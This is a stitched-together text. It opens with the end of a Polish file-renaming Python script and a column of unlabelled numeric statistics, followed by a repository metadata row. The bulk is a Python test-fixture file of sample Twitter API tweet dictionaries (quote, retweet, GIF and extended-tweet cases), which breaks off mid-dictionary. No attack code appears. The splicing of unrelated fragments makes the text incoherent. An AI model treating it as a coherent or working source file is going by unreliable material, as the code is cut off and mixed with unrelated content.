    for i in aa:
        try:
            os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("aaa")[0]
                    + i.split("aaa")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    for i in bb:
        try:
            os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("bbb")[0]
                    + i.split("bbb")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
input("\nTHE END. Press something...")
| 42.9499
| 79
| 0.295119
| 1,693
| 21,432
| 3.67218
| 0.076196
| 0.069487
| 0.067557
| 0.07206
| 0.889175
| 0.880489
| 0.868908
| 0.868908
| 0.862474
| 0.848319
| 0
| 0.017493
| 0.597238
| 21,432
| 498
| 80
| 43.036145
| 0.702734
| 0
| 0
| 0.780538
| 0
| 0
| 0.050532
| 0.007279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006211
| 0
| 0.006211
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f88f24d5f53b79992d43bac21e30e30fb4c74503
| 49,996
|
py
|
Python
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 12
|
2016-09-07T15:15:10.000Z
|
2021-05-03T23:05:13.000Z
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 17
|
2015-11-19T18:26:31.000Z
|
2021-06-22T12:43:27.000Z
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 6
|
2016-01-30T16:46:15.000Z
|
2021-01-22T20:01:03.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tweet1: plain status fixture — empty entities lists and a full "place"
# object with a Polygon bounding box (exercises geo/place handling).
tweet1 = {
    "created_at": "Tue Jun 02 13:22:55 +0000 2015",
    "id": 605726286741434400,
    "id_str": "605726286741434368",
    "text": "At LC for @archemail today: Thinking about overlap between email archiving, web archiving, and social media archiving.",
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "truncated": False,
    "in_reply_to_status_id": None,
    "in_reply_to_status_id_str": None,
    "in_reply_to_user_id": None,
    "in_reply_to_user_id_str": None,
    "in_reply_to_screen_name": None,
    "user": {
        "id": 481186914,
        "id_str": "481186914",
        "name": "Justin Littman",
        "screen_name": "justin_littman",
        "location": "",
        "description": "",
        "url": None,
        "entities": {
            "description": {
                "urls": []
            }
        },
        "protected": False,
        "followers_count": 45,
        "friends_count": 47,
        "listed_count": 5,
        "created_at": "Thu Feb 02 12:19:18 +0000 2012",
        "favourites_count": 34,
        "utc_offset": -14400,
        "time_zone": "Eastern Time (US & Canada)",
        "geo_enabled": True,
        "verified": False,
        "statuses_count": 72,
        "lang": "en",
        "contributors_enabled": False,
        "is_translator": False,
        "is_translation_enabled": False,
        "profile_background_color": "C0DEED",
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "profile_background_tile": False,
        "profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
        "profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
        "profile_link_color": "0084B4",
        "profile_sidebar_border_color": "C0DEED",
        "profile_sidebar_fill_color": "DDEEF6",
        "profile_text_color": "333333",
        "profile_use_background_image": True,
        "has_extended_profile": False,
        "default_profile": True,
        "default_profile_image": False,
        "following": False,
        "follow_request_sent": False,
        "notifications": False
    },
    "geo": None,
    "coordinates": None,
    "place": {
        "id": "01fbe706f872cb32",
        "url": "https://api.twitter.com/1.1/geo/id/01fbe706f872cb32.json",
        "place_type": "city",
        "name": "Washington",
        "full_name": "Washington, DC",
        "country_code": "US",
        "country": "United States",
        "contained_within": [],
        "bounding_box": {
            "type": "Polygon",
            "coordinates": [
                [
                    [
                        -77.119401,
                        38.801826
                    ],
                    [
                        -76.909396,
                        38.801826
                    ],
                    [
                        -76.909396,
                        38.9953797
                    ],
                    [
                        -77.119401,
                        38.9953797
                    ]
                ]
            ]
        },
        "attributes": {}
    },
    "contributors": None,
    "is_quote_status": False,
    "retweet_count": 0,
    "favorite_count": 0,
    "entities": {
        "hashtags": [],
        "symbols": [],
        "user_mentions": [],
        "urls": []
    },
    "favorited": False,
    "retweeted": False,
    "lang": "en"
}
# tweet2: status fixture with a URL entity (t.co link plus expanded and
# display forms) and possibly_sensitive flags; no place.
tweet2 = {
    "created_at": "Fri Oct 30 12:06:15 +0000 2015",
    "id": 660065173563158500,
    "id_str": "660065173563158529",
    "text": "My new blog post on techniques for harvesting social media to WARCs: https://t.co/OHZki6pXEe",
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "truncated": False,
    "in_reply_to_status_id": None,
    "in_reply_to_status_id_str": None,
    "in_reply_to_user_id": None,
    "in_reply_to_user_id_str": None,
    "in_reply_to_screen_name": None,
    "user": {
        "id": 481186914,
        "id_str": "481186914",
        "name": "Justin Littman",
        "screen_name": "justin_littman",
        "location": "",
        "description": "",
        "url": None,
        "entities": {
            "description": {
                "urls": []
            }
        },
        "protected": False,
        "followers_count": 52,
        "friends_count": 50,
        "listed_count": 5,
        "created_at": "Thu Feb 02 12:19:18 +0000 2012",
        "favourites_count": 50,
        "utc_offset": -18000,
        "time_zone": "Eastern Time (US & Canada)",
        "geo_enabled": True,
        "verified": False,
        "statuses_count": 85,
        "lang": "en",
        "contributors_enabled": False,
        "is_translator": False,
        "is_translation_enabled": False,
        "profile_background_color": "C0DEED",
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "profile_background_tile": False,
        "profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
        "profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
        "profile_link_color": "0084B4",
        "profile_sidebar_border_color": "C0DEED",
        "profile_sidebar_fill_color": "DDEEF6",
        "profile_text_color": "333333",
        "profile_use_background_image": True,
        "has_extended_profile": False,
        "default_profile": True,
        "default_profile_image": False,
        "following": False,
        "follow_request_sent": False,
        "notifications": False
    },
    "geo": None,
    "coordinates": None,
    "place": None,
    "contributors": None,
    "is_quote_status": False,
    "retweet_count": 10,
    "favorite_count": 9,
    "entities": {
        "hashtags": [],
        "symbols": [],
        "user_mentions": [],
        "urls": [
            {
                "url": "https://t.co/OHZki6pXEe",
                "expanded_url": "http://bit.ly/1ipwd0B",
                "display_url": "bit.ly/1ipwd0B",
                "indices": [
                    69,
                    92
                ]
            }
        ]
    },
    "favorited": False,
    "retweeted": False,
    "possibly_sensitive": False,
    "possibly_sensitive_appealable": False,
    "lang": "en"
}
# tweet3: status fixture with an extended entity — an animated GIF whose
# "entities" media item is type "photo" while "extended_entities" carries
# the "animated_gif" type and a video_info variant list.
tweet3 = {
    "contributors": None,
    "truncated": False,
    "text": "Test tweet 9. Tweet with a GIF. https://t.co/x6AYFg3REg",
    "is_quote_status": False,
    "in_reply_to_status_id": None,
    "id": 727894186415013888,
    "favorite_count": 0,
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "retweeted": False,
    "coordinates": None,
    "entities": {
        "symbols": [],
        "user_mentions": [],
        "hashtags": [],
        "urls": [],
        "media": [{
            "expanded_url": "http://twitter.com/jlittman_dev/status/727894186415013888/photo/1",
            "display_url": "pic.twitter.com/x6AYFg3REg",
            "url": "https://t.co/x6AYFg3REg",
            "media_url_https": "https://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg",
            "id_str": "727894166961831936",
            "sizes": {
                "large": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "small": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "medium": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "thumb": {
                    "h": 150,
                    "resize": "crop",
                    "w": 150
                }
            },
            "indices": [32, 55],
            "type": "photo",
            "id": 727894166961831936,
            "media_url": "http://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg"
        }]
    },
    "in_reply_to_screen_name": None,
    "in_reply_to_user_id": None,
    "retweet_count": 0,
    "id_str": "727894186415013888",
    "favorited": False,
    "user": {
        "follow_request_sent": False,
        "has_extended_profile": False,
        "profile_use_background_image": True,
        "default_profile_image": True,
        "id": 2875189485,
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "verified": False,
        "profile_text_color": "333333",
        "profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "profile_sidebar_fill_color": "DDEEF6",
        "entities": {
            "description": {
                "urls": []
            }
        },
        "followers_count": 0,
        "profile_sidebar_border_color": "C0DEED",
        "id_str": "2875189485",
        "profile_background_color": "C0DEED",
        "listed_count": 0,
        "is_translation_enabled": False,
        "utc_offset": None,
        "statuses_count": 9,
        "description": "",
        "friends_count": 0,
        "location": "",
        "profile_link_color": "0084B4",
        "profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "following": False,
        "geo_enabled": True,
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "screen_name": "jlittman_dev",
        "lang": "en",
        "profile_background_tile": False,
        "favourites_count": 0,
        "name": "Justin Littman dev",
        "notifications": False,
        "url": None,
        "created_at": "Thu Nov 13 15:49:55 +0000 2014",
        "contributors_enabled": False,
        "time_zone": None,
        "protected": False,
        "default_profile": True,
        "is_translator": False
    },
    "geo": None,
    "in_reply_to_user_id_str": None,
    "possibly_sensitive": False,
    "lang": "en",
    "created_at": "Wed May 04 16:14:32 +0000 2016",
    "in_reply_to_status_id_str": None,
    "place": None,
    "extended_entities": {
        "media": [{
            "expanded_url": "http://twitter.com/jlittman_dev/status/727894186415013888/photo/1",
            "display_url": "pic.twitter.com/x6AYFg3REg",
            "url": "https://t.co/x6AYFg3REg",
            "media_url_https": "https://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg",
            "video_info": {
                "aspect_ratio": [30, 23],
                "variants": [{
                    "url": "https://pbs.twimg.com/tweet_video/Chn_42fWwAASuva.mp4",
                    "bitrate": 0,
                    "content_type": "video/mp4"
                }]
            },
            "id_str": "727894166961831936",
            "sizes": {
                "large": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "small": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "medium": {
                    "h": 230,
                    "resize": "fit",
                    "w": 300
                },
                "thumb": {
                    "h": 150,
                    "resize": "crop",
                    "w": 150
                }
            },
            "indices": [32, 55],
            "type": "animated_gif",
            "id": 727894166961831936,
            "media_url": "http://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg"
        }]
    }
}
# tweet4: quote-tweet fixture — is_quote_status True with a full nested
# "quoted_status" tweet (including its own photo media and user), plus
# two URL entities on the outer tweet.
tweet4 = {
    "contributors": None,
    "truncated": False,
    "text": "Test 10. Retweet. https://t.co/tBu6RRJoKr",
    "is_quote_status": True,
    "in_reply_to_status_id": None,
    "id": 727930772691292161,
    "favorite_count": 0,
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "quoted_status_id": 503873833213104128,
    "retweeted": False,
    "coordinates": None,
    "quoted_status": {
        "contributors": None,
        "truncated": False,
        "text": "First day at Gelman Library. First tweet. http://t.co/Gz5ybAD6os",
        "is_quote_status": False,
        "in_reply_to_status_id": None,
        "id": 503873833213104128,
        "favorite_count": 4,
        "source": "<a href=\"http://twitter.com/download/android\" rel=\"nofollow\">Twitter for Android</a>",
        "retweeted": False,
        "coordinates": None,
        "entities": {
            "symbols": [],
            "user_mentions": [],
            "hashtags": [],
            "urls": [],
            "media": [{
                "expanded_url": "http://twitter.com/justin_littman/status/503873833213104128/photo/1",
                "display_url": "pic.twitter.com/Gz5ybAD6os",
                "url": "http://t.co/Gz5ybAD6os",
                "media_url_https": "https://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg",
                "id_str": "503873819560665088",
                "sizes": {
                    "large": {
                        "h": 576,
                        "resize": "fit",
                        "w": 1024
                    },
                    "small": {
                        "h": 191,
                        "resize": "fit",
                        "w": 340
                    },
                    "medium": {
                        "h": 338,
                        "resize": "fit",
                        "w": 600
                    },
                    "thumb": {
                        "h": 150,
                        "resize": "crop",
                        "w": 150
                    }
                },
                "indices": [42, 64],
                "type": "photo",
                "id": 503873819560665088,
                "media_url": "http://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg"
            }]
        },
        "in_reply_to_screen_name": None,
        "in_reply_to_user_id": None,
        "retweet_count": 0,
        "id_str": "503873833213104128",
        "favorited": False,
        "user": {
            "follow_request_sent": False,
            "has_extended_profile": False,
            "profile_use_background_image": True,
            "default_profile_image": False,
            "id": 481186914,
            "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
            "verified": False,
            "profile_text_color": "333333",
            "profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
            "profile_sidebar_fill_color": "DDEEF6",
            "entities": {
                "description": {
                    "urls": []
                }
            },
            "followers_count": 113,
            "profile_sidebar_border_color": "C0DEED",
            "id_str": "481186914",
            "profile_background_color": "C0DEED",
            "listed_count": 9,
            "is_translation_enabled": False,
            "utc_offset": -14400,
            "statuses_count": 260,
            "description": "",
            "friends_count": 64,
            "location": "",
            "profile_link_color": "0084B4",
            "profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
            "following": False,
            "geo_enabled": True,
            "profile_banner_url": "https://pbs.twimg.com/profile_banners/481186914/1460820528",
            "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
            "screen_name": "justin_littman",
            "lang": "en",
            "profile_background_tile": False,
            "favourites_count": 117,
            "name": "Justin Littman",
            "notifications": False,
            "url": None,
            "created_at": "Thu Feb 02 12:19:18 +0000 2012",
            "contributors_enabled": False,
            "time_zone": "Eastern Time (US & Canada)",
            "protected": False,
            "default_profile": True,
            "is_translator": False
        },
        "geo": None,
        "in_reply_to_user_id_str": None,
        "possibly_sensitive": False,
        "lang": "en",
        "created_at": "Mon Aug 25 11:57:38 +0000 2014",
        "in_reply_to_status_id_str": None,
        "place": None,
        "extended_entities": {
            "media": [{
                "expanded_url": "http://twitter.com/justin_littman/status/503873833213104128/photo/1",
                "display_url": "pic.twitter.com/Gz5ybAD6os",
                "url": "http://t.co/Gz5ybAD6os",
                "media_url_https": "https://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg",
                "id_str": "503873819560665088",
                "sizes": {
                    "large": {
                        "h": 576,
                        "resize": "fit",
                        "w": 1024
                    },
                    "small": {
                        "h": 191,
                        "resize": "fit",
                        "w": 340
                    },
                    "medium": {
                        "h": 338,
                        "resize": "fit",
                        "w": 600
                    },
                    "thumb": {
                        "h": 150,
                        "resize": "crop",
                        "w": 150
                    }
                },
                "indices": [42, 64],
                "type": "photo",
                "id": 503873819560665088,
                "media_url": "http://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg"
            }]
        }
    },
    "entities": {
        "symbols": [],
        "user_mentions": [],
        "hashtags": [],
        "urls": [{
            "url": "https://t.co/tBu6RRJoKr",
            "indices": [18, 41],
            "expanded_url": "https://twitter.com/justin_littman/status/503873833213104128",
            "display_url": "twitter.com/justin_littman\u2026"
        },
        {
            "url": "https://t.co/6zD9PKIhKP",
            "expanded_url": "http://bit.ly/1NoNeBF",
            "display_url": "bit.ly/1NoNeBF",
            "indices": [
                41,
                64
            ]
        }
        ]
    },
    "in_reply_to_screen_name": None,
    "in_reply_to_user_id": None,
    "retweet_count": 0,
    "id_str": "727930772691292161",
    "favorited": False,
    "user": {
        "follow_request_sent": False,
        "has_extended_profile": False,
        "profile_use_background_image": True,
        "default_profile_image": True,
        "id": 2875189485,
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "verified": False,
        "profile_text_color": "333333",
        "profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "profile_sidebar_fill_color": "DDEEF6",
        "entities": {
            "description": {
                "urls": []
            }
        },
        "followers_count": 0,
        "profile_sidebar_border_color": "C0DEED",
        "id_str": "2875189485",
        "profile_background_color": "C0DEED",
        "listed_count": 0,
        "is_translation_enabled": False,
        "utc_offset": None,
        "statuses_count": 10,
        "description": "",
        "friends_count": 0,
        "location": "",
        "profile_link_color": "0084B4",
        "profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "following": False,
        "geo_enabled": True,
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "screen_name": "jlittman_dev",
        "lang": "en",
        "profile_background_tile": False,
        "favourites_count": 0,
        "name": "Justin Littman dev",
        "notifications": False,
        "url": None,
        "created_at": "Thu Nov 13 15:49:55 +0000 2014",
        "contributors_enabled": False,
        "time_zone": None,
        "protected": False,
        "default_profile": True,
        "is_translator": False
    },
    "geo": None,
    "in_reply_to_user_id_str": None,
    "possibly_sensitive": False,
    "lang": "en",
    "created_at": "Wed May 04 18:39:55 +0000 2016",
    "quoted_status_id_str": "503873833213104128",
    "in_reply_to_status_id_str": None,
    "place": None
}
# tweet5 has a retweet_status: a native retweet. The outer object is the
# retweet itself (text prefixed "RT @..."); the complete original tweet,
# including its own user, entities, and a non-null "place", is embedded
# under "retweeted_status".
tweet5: dict = {
    "contributors": None,
    "truncated": False,
    "text": "RT @justin_littman: Ahh ... so in the context of web crawling, that's what a \"frontier\" means: https://t.co/6oDZe03LsV",
    "is_quote_status": False,
    "in_reply_to_status_id": None,
    "id": 727933040803057667,
    "favorite_count": 0,
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "retweeted": False,
    "coordinates": None,
    # Entities of the retweet wrapper: the mention of the original author
    # plus the URL carried over from the original text.
    "entities": {
        "symbols": [],
        "user_mentions": [{
            "id": 481186914,
            "indices": [3, 18],
            "id_str": "481186914",
            "screen_name": "justin_littman",
            "name": "Justin Littman"
        }],
        "hashtags": [],
        "urls": [{
            "url": "https://t.co/6oDZe03LsV",
            "indices": [95, 118],
            "expanded_url": "http://nlp.stanford.edu/IR-book/html/htmledition/the-url-frontier-1.html",
            "display_url": "nlp.stanford.edu/IR-book/html/h\u2026"
        }]
    },
    "in_reply_to_screen_name": None,
    "in_reply_to_user_id": None,
    "retweet_count": 2,
    "id_str": "727933040803057667",
    "favorited": False,
    # The original tweet that was retweeted, embedded in full.
    "retweeted_status": {
        "contributors": None,
        "truncated": False,
        "text": "Ahh ... so in the context of web crawling, that's what a \"frontier\" means: https://t.co/6oDZe03LsV",
        "is_quote_status": False,
        "in_reply_to_status_id": None,
        "id": 725271102444953601,
        "favorite_count": 2,
        "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
        "retweeted": False,
        "coordinates": None,
        "entities": {
            "symbols": [],
            "user_mentions": [],
            "hashtags": [],
            "urls": [{
                "url": "https://t.co/6oDZe03LsV",
                "indices": [75, 98],
                "expanded_url": "http://nlp.stanford.edu/IR-book/html/htmledition/the-url-frontier-1.html",
                "display_url": "nlp.stanford.edu/IR-book/html/h\u2026"
            }]
        },
        "in_reply_to_screen_name": None,
        "in_reply_to_user_id": None,
        "retweet_count": 2,
        "id_str": "725271102444953601",
        "favorited": False,
        # Author of the original tweet.
        "user": {
            "follow_request_sent": False,
            "has_extended_profile": False,
            "profile_use_background_image": True,
            "default_profile_image": False,
            "id": 481186914,
            "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
            "verified": False,
            "profile_text_color": "333333",
            "profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
            "profile_sidebar_fill_color": "DDEEF6",
            "entities": {
                "description": {
                    "urls": []
                }
            },
            "followers_count": 113,
            "profile_sidebar_border_color": "C0DEED",
            "id_str": "481186914",
            "profile_background_color": "C0DEED",
            "listed_count": 9,
            "is_translation_enabled": False,
            "utc_offset": -14400,
            "statuses_count": 260,
            "description": "",
            "friends_count": 64,
            "location": "",
            "profile_link_color": "0084B4",
            "profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
            "following": False,
            "geo_enabled": True,
            "profile_banner_url": "https://pbs.twimg.com/profile_banners/481186914/1460820528",
            "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
            "screen_name": "justin_littman",
            "lang": "en",
            "profile_background_tile": False,
            "favourites_count": 117,
            "name": "Justin Littman",
            "notifications": False,
            "url": None,
            "created_at": "Thu Feb 02 12:19:18 +0000 2012",
            "contributors_enabled": False,
            "time_zone": "Eastern Time (US & Canada)",
            "protected": False,
            "default_profile": True,
            "is_translator": False
        },
        "geo": None,
        "in_reply_to_user_id_str": None,
        "possibly_sensitive": False,
        "lang": "en",
        "created_at": "Wed Apr 27 10:31:20 +0000 2016",
        "in_reply_to_status_id_str": None,
        # Unlike the outer retweet, the original tweet carries a "place".
        "place": {
            "full_name": "Centreville, VA",
            "url": "https://api.twitter.com/1.1/geo/id/ffcc53c4a4e7a620.json",
            "country": "United States",
            "place_type": "city",
            "bounding_box": {
                "type": "Polygon",
                "coordinates": [
                    [
                        [-77.479597, 38.802143],
                        [-77.397429, 38.802143],
                        [-77.397429, 38.880183],
                        [-77.479597, 38.880183]
                    ]
                ]
            },
            "contained_within": [],
            "country_code": "US",
            "attributes": {},
            "id": "ffcc53c4a4e7a620",
            "name": "Centreville"
        }
    },
    # The account that performed the retweet.
    "user": {
        "follow_request_sent": False,
        "has_extended_profile": False,
        "profile_use_background_image": True,
        "default_profile_image": True,
        "id": 2875189485,
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "verified": False,
        "profile_text_color": "333333",
        "profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "profile_sidebar_fill_color": "DDEEF6",
        "entities": {
            "description": {
                "urls": []
            }
        },
        "followers_count": 0,
        "profile_sidebar_border_color": "C0DEED",
        "id_str": "2875189485",
        "profile_background_color": "C0DEED",
        "listed_count": 0,
        "is_translation_enabled": False,
        "utc_offset": None,
        "statuses_count": 11,
        "description": "",
        "friends_count": 0,
        "location": "",
        "profile_link_color": "0084B4",
        "profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "following": False,
        "geo_enabled": True,
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "screen_name": "jlittman_dev",
        "lang": "en",
        "profile_background_tile": False,
        "favourites_count": 0,
        "name": "Justin Littman dev",
        "notifications": False,
        "url": None,
        "created_at": "Thu Nov 13 15:49:55 +0000 2014",
        "contributors_enabled": False,
        "time_zone": None,
        "protected": False,
        "default_profile": True,
        "is_translator": False
    },
    "geo": None,
    "in_reply_to_user_id_str": None,
    "possibly_sensitive": False,
    "lang": "en",
    "created_at": "Wed May 04 18:48:55 +0000 2016",
    "in_reply_to_status_id_str": None,
    "place": None
}
# tweet6 has an extended tweet (Stream API): "truncated" is True, the
# top-level "text" ends with an ellipsis plus a permalink URL, and the
# complete text/entities live under "extended_tweet" ("full_text",
# "display_text_range" 16..156).
tweet6: dict = {
    "contributors": None,
    "truncated": True,
    "text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will… https://t.co/Hq4h61I3FX",
    "is_quote_status": False,
    # NOTE(review): the numeric "id"/"in_reply_to_status_id" values (…400/…600)
    # disagree with their *_str counterparts (…440/…617) — presumably precision
    # loss from a float-based JSON tool when this fixture was captured; code
    # under test should rely on the *_str fields. TODO: confirm against the
    # original capture.
    "in_reply_to_status_id": 839526473534959600,
    "id": 847804888365117400,
    "favorite_count": 0,
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "retweeted": False,
    "coordinates": None,
    "timestamp_ms": "1490967411496",
    # Entities for the TRUNCATED text: the URL entity here is the
    # twitter.com/i/web/status permalink, not the real link.
    "entities": {
        "user_mentions": [
            {
                "id": 481186914,
                "indices": [
                    0,
                    15
                ],
                "id_str": "481186914",
                "screen_name": "justin_littman",
                "name": "Justin Littman"
            }
        ],
        "symbols": [],
        "hashtags": [],
        "urls": [
            {
                "url": "https://t.co/Hq4h61I3FX",
                "indices": [
                    117,
                    140
                ],
                "expanded_url": "https://twitter.com/i/web/status/847804888365117440",
                "display_url": "twitter.com/i/web/status/8…"
            }
        ]
    },
    "in_reply_to_screen_name": "justin_littman",
    "id_str": "847804888365117440",
    "display_text_range": [
        16,
        140
    ],
    "retweet_count": 0,
    "in_reply_to_user_id": 481186914,
    "favorited": False,
    # Stream-API user objects omit some REST-only fields (e.g.
    # has_extended_profile) and use None where REST uses "".
    "user": {
        "follow_request_sent": None,
        "profile_use_background_image": True,
        "default_profile_image": True,
        "id": 2875189485,
        "verified": False,
        "profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "profile_sidebar_fill_color": "DDEEF6",
        "profile_text_color": "333333",
        "followers_count": 0,
        "profile_sidebar_border_color": "C0DEED",
        "id_str": "2875189485",
        "profile_background_color": "C0DEED",
        "listed_count": 3,
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "utc_offset": None,
        "statuses_count": 21,
        "description": None,
        "friends_count": 0,
        "location": None,
        "profile_link_color": "1DA1F2",
        "profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "following": None,
        "geo_enabled": True,
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "name": "Justin Littman dev",
        "lang": "en",
        "profile_background_tile": False,
        "favourites_count": 0,
        "screen_name": "jlittman_dev",
        "notifications": None,
        "url": None,
        "created_at": "Thu Nov 13 15:49:55 +0000 2014",
        "contributors_enabled": False,
        "time_zone": None,
        "protected": False,
        "default_profile": True,
        "is_translator": False
    },
    "geo": None,
    "in_reply_to_user_id_str": "481186914",
    "possibly_sensitive": False,
    "lang": "en",
    # Full 157-char text and its real entities; this is what extended-mode
    # consumers should read instead of the truncated top-level fields.
    "extended_tweet": {
        "display_text_range": [
            16,
            156
        ],
        "entities": {
            "user_mentions": [
                {
                    "id": 481186914,
                    "indices": [
                        0,
                        15
                    ],
                    "id_str": "481186914",
                    "screen_name": "justin_littman",
                    "name": "Justin Littman"
                }
            ],
            "symbols": [],
            "hashtags": [],
            "urls": [
                {
                    "url": "https://t.co/MfQy5wTWBc",
                    "indices": [
                        133,
                        156
                    ],
                    "expanded_url": "https://gwu-libraries.github.io/sfm-ui/posts/2017-03-31-extended-tweets",
                    "display_url": "gwu-libraries.github.io/sfm-ui/posts/2…"
                }
            ]
        },
        "full_text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will be available at: https://t.co/MfQy5wTWBc"
    },
    "created_at": "Fri Mar 31 13:36:51 +0000 2017",
    "filter_level": "low",
    "in_reply_to_status_id_str": "839526473534959617",
    "place": None
}
# tweet 7 is an extended tweet from the REST API (tweet_mode=extended):
# the same status as tweet6, but with "full_text" at the top level instead
# of "text"/"extended_tweet", and "truncated" False.
tweet7: dict = {
    "contributors": None,
    "truncated": False,
    "is_quote_status": False,
    # NOTE(review): numeric "id"/"in_reply_to_status_id" (…400/…600) disagree
    # with the *_str fields (…440/…617) — presumably float precision loss when
    # the fixture was captured; rely on the *_str values. TODO: confirm.
    "in_reply_to_status_id": 839526473534959600,
    "id": 847804888365117400,
    "favorite_count": 0,
    "full_text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will be available at: https://t.co/MfQy5wTWBc",
    "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
    "retweeted": False,
    "coordinates": None,
    # Entities here already cover the full (untruncated) text.
    "entities": {
        "symbols": [],
        "user_mentions": [
            {
                "id": 481186914,
                "indices": [
                    0,
                    15
                ],
                "id_str": "481186914",
                "screen_name": "justin_littman",
                "name": "Justin Littman"
            }
        ],
        "hashtags": [],
        "urls": [
            {
                "url": "https://t.co/MfQy5wTWBc",
                "indices": [
                    133,
                    156
                ],
                "expanded_url": "https://gwu-libraries.github.io/sfm-ui/posts/2017-03-31-extended-tweets",
                "display_url": "gwu-libraries.github.io/sfm-ui/posts/2…"
            }
        ]
    },
    "in_reply_to_screen_name": "justin_littman",
    "in_reply_to_user_id": 481186914,
    "display_text_range": [
        16,
        156
    ],
    "retweet_count": 0,
    "id_str": "847804888365117440",
    "favorited": False,
    "user": {
        "follow_request_sent": False,
        "has_extended_profile": False,
        "profile_use_background_image": True,
        "default_profile_image": True,
        "id": 2875189485,
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
        "verified": False,
